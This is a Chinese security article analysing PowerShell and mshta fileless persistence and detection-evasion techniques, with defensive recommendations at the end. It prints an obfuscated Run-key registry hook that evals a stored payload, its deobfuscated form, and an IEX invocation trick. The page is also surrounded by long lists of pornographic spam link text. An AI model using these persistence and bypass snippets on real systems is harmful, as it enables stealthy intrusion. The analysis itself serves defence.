精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PowerShell注入技巧:無盤持久性和繞過技術

安全 網站安全
由于安全研究人員和網絡攻擊者會遇到越來越先進的PowerShell以及相應的檢測繞過技術,而且隨著代碼混淆技術的不斷發展,安全防御人員的工作更是難上加難。

寫在前面的話

PowerShell是網絡安全專家、IT管理員以及黑客們最喜歡的工具之一,這一點是毋庸置疑的。PowerShell的可擴展性和其強大的功能讓微軟操作系統的可控制程度上升到了一個前所未有的等級。簡單說來,Powershell 是運行在windows機器上實現系統和應用程序管理自動化的命令行腳本環境,而它可以算是顛覆了傳統的命令行提示符-cmd.exe。

在Binary Defense(一家專業從事網絡安全業務的公司)中有著大量PowerShell的擁護者,無論是進行自動化測試也好,還是進行復雜的程序分析也罷,PowerShell都是他們的首選工具。除此之外,像PowerShell Empire以及PowerSploit這樣的工具也是網絡安全研究領域以及黑客的摯愛。

[[190526]]

攻擊分析

我們通常可以看到很多利用PowerShell的攻擊向量,而且在昨天晚上,我們的終端安全檢測與應急響應平臺(Vision)檢測到了一個使用了多種方法來實現攻擊持久化并規避傳統反病毒技術的攻擊事件。它所使用的第一種方法是讓目標用戶訪問一個需要升級Adobe Flash瀏覽器插件的網站,而攻擊者在這里需要使用到mshta.exe(一種HTA攻擊方法),MSHTA.exe是微軟的一個合法程序,它可以在任何瀏覽器中隨時調用。但是在大多數情況下,它并不是合法的擴展,因此我們建議用戶在配置防火墻時屏蔽所有的HTA擴展。因為HTA文件允許我們調用任意的命令,而攻擊者同樣可以做到這一點,所以啟用HTA擴展很有可能讓我們的主機遭到攻擊。

需要注意的是,這個攻擊向量在很多年前就已經嵌入在了Unicorn和社會工程學工具套件(SET)之中了。

PowerShell的攻擊向量

此時,如果系統彈出了提示框,而攻擊者又根據提示框中的信息進行了操作(打開-open),那么目標用戶將會被攻擊。攻擊向量可以是一個VBS下載器、PowerShell,或者是一段下載后自動執行的惡意代碼。只要用戶點擊了“Open”,任何事情都有可能會發生。但是在我們近期所研究的攻擊案例中,攻擊者使用了HTA攻擊方法作為攻擊的初始階段和Dropper。

頁面會發起一個惡意HTA,當用戶打開了這個HTA之后,Vision會立刻檢測到其惡意行為:

惡意HTA

當文件被打開之后,一段PowerShell命令將會被執行。一般情況下攻擊者會通過PowerShell發動SYSWOW64降級攻擊,這種攻擊向量可以將進程降級為32位進程,并實現shellcode注入攻擊,而且Unicorn/SET多年以來一直都在使用這種技術。

在對具體的日志記錄進行了分析之后我們發現,很多攻擊者會使用Invoke-Expression(IEX)來提取出特定的注冊表鍵,并實現持久化鉤子。在PowerShell的初始調用中,變量名和持久化鉤子都經過了混淆處理。大致如下圖所示:

在PowerShell的初始調用中,變量名和持久化鉤子都經過了混淆處理

在這種攻擊中,注冊表入口位于CurrentVersion\Run,而這里也是持久化鉤子的起始位置。

日志信息如下:

混淆后的持久化注冊表鉤子:

  1. HKEY_USERS:SANITIZED\Software\Microsoft\Windows\CurrentVersion\Run 
  2. "C:\Windows\system32\mshta.exe" "about:<script>c1hop="X642N10";R3I=new%20ActiveXObject("WScript.Shell");QR3iroUf="I7pL7";k9To7P=R3I.RegRead("HKCU\\software\\bkzlq\\zsdnhepyzs");J7UuF1n="Q2LnLxas";eval(k9To7P);JUe5wz3O="zSfmLod";</script>

反混淆后的持久化注冊表鉤子:

  1. <script> 
  2. WScript_Shell_Object = new ActiveXObject("WScript.Shell"); 
  3. Registry_Key_Value=WScript_Shell_Object.RegRead("HKCU\\software\\bkzlq\\zsdnhepyzs"); 
  4. eval(Registry_Key_Value); 
  5. </script> 

這種就是我們所稱之為的無文件攻擊向量,因為它不需要向硬盤寫入任何內容,它唯一需要的就是注冊表鍵,并通過運行注冊表鍵來在目標系統中實現持久化注入。在我們的攻擊場景中,mshta.exe將利用嵌入了PowerShell指令的WScript.shell來調用特定的注冊表鍵,而且傳統的反病毒產品以及目前絕大多數安全解決方案都無法檢測到這種無文件的持久化攻擊。

利用原生的PowerShell以及mshta,攻擊者將可以通過傳統的感染技術來實現系統入侵,而且完全不需要下載額外的惡意代碼或安插系統后門。在此過程中,大多數攻擊者會選擇使用Invoke-Expression,但是具體的攻擊實現方法也是多種多樣的。近期,安全研究專家Vincent Yiu(@vysecurity)演示了一種無需調用IEX和ExcodedCommand就可以繞過傳統檢測技術的攻擊方法,而且目前很多高級攻擊者也在廣泛使用這種技術。有關這項技術的更多詳細內容請參考Vincent Yiu的Twitter:

繞過傳統檢測技術的攻擊方法

在這個例子中,網站的TXT記錄將會下載PowerShell命令,并通過nslookup在系統中執行這些命令。這也就意味著,我們可以將命令注入在DNS的TXT記錄中,然后讓系統自動執行這些PowerShell命令。Vision所檢測到的一種惡意行為模式如下:

Vision所檢測到的一種惡意行為模式

如果檢測到了nslookup或者代碼提取行為,那么Vision將能夠迅速識別出PowerShell代碼中的nslookup請求以及TXT記錄中的惡意代碼。需要注意的是,Vencent Yiu所提供的方法只能執行一個文件而無法執行代碼本身,因此我們還需要其他的命令從nslookup TXT記錄中提取出代碼并執行它們。

安全研究專家Daniel Bohannon給出了一種不同的實現方法,但這種方法仍然需要用到IEX。演示樣例如下:

  1. $nslookupResult1 = 'iex' 
  2. $nslookupResult2 = 'Write-Host THIS IS MY ACTUAL PAYLOAD -f green' 
  3. . $nslookupResult1 $nslookupResult2 
  4.    
  5. or even better: 
  6.    
  7. $nslookupAllInOne = @('iex','Write-Host ALL IN ONE -f green') 
  8. . $nslookupAllInOne[0] $nslookupAllInOne[1] 

下圖為Vision所識別出的一種特定攻擊模式:

Vision所識別出的一種特定攻擊模式

應對方案

對于那些沒有使用Vision代碼防御平臺的企業來說,可以采用以下幾種實踐方法來防止攻擊者利用PowerShell攻擊企業的網絡系統:

  • 限制PowerShell命令的字符長度;
  • 限制PowerShell的語言模式;
  • 啟用增強型PowerShell;(參考資料);
  • 定期執行威脅檢測以盡早識別出可疑活動;
  • 審查DNS日志并尋找可疑的控制命令和DNS請求;
  • 搜索可疑的System.Management.Automation.dll以及System.Management.Automation.ni.dll
  • 利用類似Sysmon這樣的工具來檢測和記錄可疑進程;
  • 在正常情況下禁止普通用戶執行PowerShell命令(AppLocker +Device Guard可以防止普通用戶使用PowerShell);
  • 監控powershell.exe的子進程以及可能存在的鉤子;
  • 搜索powershell.exe派生出的32位PowerShell子進程,這也是一種shellcode注入技術的典型檢測方法;

更多內容請參考Matthew Graeber的Twitter;

總結

由于安全研究人員和網絡攻擊者會遇到越來越先進的PowerShell以及相應的檢測繞過技術,那些基于模式識別的傳統檢測方法已經不能再僅僅依靠惡意PowerShell來完成檢測了,而且隨著代碼混淆技術的不斷發展,安全防御人員的工作更是難上加難。因此,我們只有盡早地識別出可疑的行為模式,才能夠降低個人用戶和企業用戶受到攻擊的可能性。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2013-07-09 10:18:58

VDI虛擬化

2019-01-17 04:41:38

2021-05-25 10:20:31

Python持久性編程語言

2009-09-27 09:55:38

Hibernate持久

2019-09-06 09:50:52

云存儲硬盤云服務

2021-12-29 14:04:14

惡意軟件黑客網絡攻擊

2009-09-23 15:25:08

Hibernate 3

2022-10-27 08:00:32

DockerAWS云容器

2017-09-07 15:39:27

2021-01-22 10:40:08

Linux文件內存

2021-06-02 08:00:00

MOSH開源工具

2009-09-15 16:37:06

Google App 持久性

2013-01-11 16:23:29

2023-12-08 08:26:05

數據存儲持久性

2025-06-09 00:04:00

2014-06-05 14:41:05

亞馬遜AWS

2015-10-12 11:37:07

2017-11-06 05:52:52

2023-02-28 09:47:42

2013-07-23 15:10:34

PowerShell
點贊
收藏

51CTO技術棧公眾號

成人三级在线视频| 日本精品三区| 亚洲午夜精品在线| 国产精品yjizz| 日本免费观看视| 美女视频亚洲色图| 欧美日韩中文在线观看| 日韩免费中文专区| 国产免费久久久| 久久久久av| 精品国产一区二区在线观看| av日韩一区二区三区| 亚洲欧美日韩综合在线| 轻轻草成人在线| 久久久极品av| 国产二级一片内射视频播放| 日本高清不卡一区二区三区视频| 中文字幕一区三区| 丁香婷婷久久久综合精品国产| 国产精品第九页| 九九综合久久| 日韩欧美中文一区二区| 免费观看美女裸体网站| 久久99久久| 国产精品性做久久久久久| 欧美精品久久久久久久| 一本加勒比北条麻妃| 浪潮色综合久久天堂| 国产精品国产a| 国产在线精品一区二区中文| 久草热在线观看| 亚洲久久在线| 久久高清视频免费| 强伦人妻一区二区三区| www.成人在线.com| 亚洲人成网站色在线观看 | 91老司机福利在线| 欧美国产精品久久| 成人欧美一区二区三区视频xxx| 成年免费在线观看| 亚洲91中文字幕无线码三区| 日韩精品在线私人| 日本在线观看视频一区| 蜜桃成人精品| 午夜激情一区二区| 六月婷婷激情网| www.亚洲免费| 99免费精品视频| 99蜜桃在线观看免费视频网站| 欧美国产一级片| 一本色道久久综合亚洲精品不卡| 啊v视频在线一区二区三区| 三级黄色片网站| 98视频精品全部国产| 欧美久久一区二区| 久久久久久久久久久99| 欧美1—12sexvideos| 国产精品黄色在线观看| 日本一区二区三不卡| 人妻丰满熟妇av无码区hd| 国产精品性做久久久久久| 国产精品av免费在线观看| 日韩免费黄色片| 国产精品mm| 欧美另类在线观看| 欧美日韩色视频| 日韩免费视频| 在线观看欧美日韩| 亚洲第一黄色网址| 窝窝社区一区二区| 亚洲人成网7777777国产| 亚洲啪av永久无码精品放毛片 | 国产精品99一区二区三区| 亚洲丁香婷深爱综合| 四虎国产精品免费| 中文字幕日韩在线| 精品少妇一区二区三区在线视频| 亚洲一级片免费观看| 91亚洲精品在看在线观看高清| 欧美男女性生活在线直播观看| 福利在线一区二区三区| 向日葵视频成人app网址| 色综合色综合色综合| 国产极品粉嫩福利姬萌白酱| 91av亚洲| 精品日韩中文字幕| 乱子伦视频在线看| 福利一区视频| 欧美一区二区视频在线观看| 九色91porny| 久久91在线| 国产网站欧美日韩免费精品在线观看| 亚洲第一黄色网址| 国产精品嫩草影院在线看| 在线日韩精品视频| www.超碰在线观看| 亚洲精品影院在线观看| 日本精品免费观看| 日日夜夜狠狠操| 热久久免费视频| 91在线免费网站| www.桃色av嫩草.com| 粉嫩aⅴ一区二区三区四区五区| 狠狠久久综合婷婷不卡| 国产系列在线观看| 亚洲精品国产精华液| www国产精品内射老熟女| 中文字幕在线官网| 欧美酷刑日本凌虐凌虐| 91精品国产高清91久久久久久| 国产精品18hdxxxⅹ在线| 亚洲精品综合久久中文字幕| 91久久久久久久久久久久久久| 欧美午夜不卡| 国产精品美女午夜av| 99热这里只有精品99| 2023国产精品| 成年人三级视频| 深夜在线视频| 欧美一区二区三区婷婷月色| 少妇光屁股影院| 91视频综合| 4p变态网欧美系列| 99久久精品国产色欲| 久久九九久精品国产免费直播| 亚洲韩国在线| av影院在线免费观看| 欧美日韩不卡一区| 少妇精品一区二区| 欧美激情aⅴ一区二区三区| 国产精国产精品| 国产人妖在线播放| 国产欧美日韩三级| 青娱乐自拍偷拍| 精品国产一区二区三区性色av| 亚洲男人天堂视频| 久视频在线观看| 精品亚洲porn| 区一区二区三区中文字幕| 免费在线看污片| 制服.丝袜.亚洲.另类.中文 | 中文字幕在线网址| 97精品国产露脸对白| 一区二区在线中文字幕电影视频| 激情视频网站在线播放色| 欧美精品精品一区| 婷婷综合在线视频| 玖玖在线精品| 国产亚洲精品自在久久| 羞羞的网站在线观看| 777奇米四色成人影色区| 国产sm调教视频| 久久久精品网| 免费成人在线观看av| 18在线观看的| 欧美一卡二卡三卡四卡| 久久精品亚洲a| 久久精品二区亚洲w码| 欧美一区免费视频| 波多野结衣乳巨码无在线观看| 欧美一区二区三区免费大片 | 综合久久久久久| 青青草久久伊人| 99久久.com| 成人情趣片在线观看免费| 欧美成人hd| 欧美三级日韩在线| 无码人中文字幕| 久久机这里只有精品| 在线一区日本视频| 国产激情综合| 欧美人与物videos| 亚洲av少妇一区二区在线观看| 一区二区三区中文字幕在线观看| 肉丝美足丝袜一区二区三区四| 欧美日韩一卡| 国产区日韩欧美| 国产精品论坛| 亚洲深夜福利网站| 欧美成人精品网站| 中文字幕日韩一区二区| 亚洲精品成人在线播放| 91精品蜜臀一区二区三区在线| 国产欧美韩国高清| 黄网页在线观看| 欧美精品一区二区在线播放| 日韩欧美一区二区一幕| 久久精品男人的天堂| 怡红院亚洲色图| 欧美精品九九| 久久99欧美| 国产91欧美| 久久九九国产精品怡红院| 99热这里只有精品在线观看| 午夜精品在线看| 一道本在线观看| 国产麻豆精品久久一二三| 男人插女人视频在线观看| 九九视频精品全部免费播放| 国产欧美精品一区二区三区-老狼| 1区2区在线观看| 日韩精品中文字幕久久臀| 中文字幕日本人妻久久久免费| 亚洲乱码精品一二三四区日韩在线| 亚洲精品无码一区二区| 日韩中文字幕麻豆| 欧美日韩在线免费观看视频| 国产厕拍一区| 国产精品h在线观看| 18网站在线观看| 精品一区二区三区三区| 国产精品久久久久久免费免熟| 亚洲欧美激情插| 黄色在线观看av| 国产一级精品在线| 久久九九国产视频| 日韩激情在线| 久久国产精品一区二区三区四区| 久久天天久久| 国产91在线播放| 污片在线免费观看| 亚洲香蕉伊综合在人在线视看| 国产黄色av片| 欧美另类久久久品| 日本熟女毛茸茸| 亚洲一区二区在线视频| 亚洲精品国产精品国自| 国产麻豆午夜三级精品| 欧美成人黑人猛交| 国产日韩精品视频一区二区三区 | 69av在线播放| 成视频免费观看在线看| 在线播放国产精品| 深爱五月激情五月| 日韩欧美激情在线| 一区二区三区日| 福利微拍一区二区| 激情五月婷婷在线| 中文字幕视频一区| 亚洲av熟女国产一区二区性色| 国产精品77777竹菊影视小说| 久久午夜夜伦鲁鲁一区二区| 午夜久久影院| 影音先锋男人的网站| 成人6969www免费视频| 欧美大香线蕉线伊人久久国产精品 | 91丝袜在线| 免费99精品国产自在在线| 国产www.大片在线| 日韩av影院在线观看| 国精产品乱码一区一区三区四区| 欧美精品一二三| 在线观看国产黄| 欧美日韩亚洲视频| 国产成人亚洲精品自产在线| 亚洲高清视频在线| 青青草原免费观看| 一区二区在线观看免费| 日本中文字幕免费在线观看| 亚洲人午夜精品天堂一二香蕉| 在线日韩国产网站| 亚洲色图.com| 特级片在线观看| 综合久久久久综合| 国内偷拍精品视频| 亚洲一区二区三区四区不卡| 久久久久久久久毛片| 一区二区三区四区不卡视频| 人与动物性xxxx| 一区二区三区在线免费播放 | 欧美性videos高清精品| 日韩在线视频不卡| 欧美乱妇一区二区三区不卡视频| www.久久成人| 亚洲男人天堂网| 黄黄的网站在线观看| 久久久久久久激情视频| 国产欧美一区二区三区精品酒店| 国产精品一区二区久久久久| 精品一区二区三区中文字幕视频| 国产精品一区在线播放| 伊人久久大香线蕉无限次| 亚洲乱码一区二区三区| 午夜激情一区| 亚洲视频在线a| 国产美女精品在线| 日韩 中文字幕| 国产精品久久久久四虎| 国产一级一片免费播放| 欧美系列日韩一区| 欧美一级特黄aaaaaa| 色777狠狠综合秋免鲁丝 | 国产精品久久久久久久久男| 精品视频在线观看免费观看| 欧美国产视频在线观看| 亚洲五月综合| 欧美激情精品久久久久久小说| 国产乱淫av一区二区三区| 少妇大叫太粗太大爽一区二区| 亚洲天堂a在线| 无码人妻熟妇av又粗又大| 日韩精品一区二区三区中文精品| 黄色大片在线免费观看| 欧美激情欧美狂野欧美精品 | 亚洲一区二区三区在线视频| 亚洲精华一区二区三区| aaa免费在线观看| 美女久久网站| 国产香蕉精品视频| 成人欧美一区二区三区黑人麻豆 | 日日夜夜精品网站| 欧美精品九九| 91国内在线播放| 国产视频视频一区| 日本一二三区不卡| 日韩一区二区三区精品视频| 国产综合在线观看| 97精品国产91久久久久久| 91麻豆精品国产91久久久更新资源速度超快| 精品一区二区三区免费毛片| 欧美a级一区| 色天使在线观看| 日本一区二区三区在线观看| 午夜影院在线看| 精品国产1区2区3区| 男人天堂久久久| 国产精品入口夜色视频大尺度 | 大尺度一区二区| 国产精品免费人成网站酒店| 欧美日韩免费视频| 大乳在线免费观看| 日本精品久久久久影院| 日本国产精品| 久久久久久久久久久99| 成人深夜在线观看| 国产午夜福利片| 精品国产乱码久久久久久牛牛| 综合久久2019| 91麻豆国产精品| 亚洲啊v在线观看| xxxx在线免费观看| 最新欧美精品一区二区三区| 国产又色又爽又黄又免费| 中文字幕精品在线| 精品176极品一区| 亚洲开发第一视频在线播放| 麻豆久久久久久| 天天鲁一鲁摸一摸爽一爽| 欧美日韩国产不卡| 九色porny丨首页在线| 91精品久久久久久久久久久| 天天影视欧美综合在线观看| 精品国产鲁一鲁一区二区三区| 综合久久国产九一剧情麻豆| 国产农村老头老太视频| 美女精品久久久| 亚洲国产欧美国产第一区| 国产欧美久久久久| 成人av在线看| 国产在线观看黄色| 亚洲无限av看| 欧美美女福利视频| 影音先锋成人资源网站| thepron国产精品| aaa人片在线| 一区二区三区精品99久久| 日韩国产一二三区| 国产 欧美 日本| 91视频com| 中文字幕人妻互换av久久| 免费99精品国产自在在线| 欧亚精品一区| 成人性生生活性生交12| 亚洲美女在线一区| 五月婷婷在线观看视频| 国产精品成人aaaaa网站| 欧美激情777| 91九色蝌蚪porny| 色先锋资源久久综合| 黄色网址在线免费播放| 国产伦精品一区二区三区视频免费| 久久xxxx精品视频| 久久久久久久久久97| 亚洲国产精品久久久久| 亚洲成人av观看| 91成人综合网| 中文在线一区二区 | 91久久青草| 欧美a v在线播放| 国产精品久久久久桃色tv| 日本国产在线观看| 国产美女精品免费电影| 亚洲日韩成人| 亚洲一二三四五六区| 亚洲丁香久久久| **国产精品| 乱子伦视频在线看| 亚洲午夜三级在线| 在线免费av网站| 精品中文字幕一区|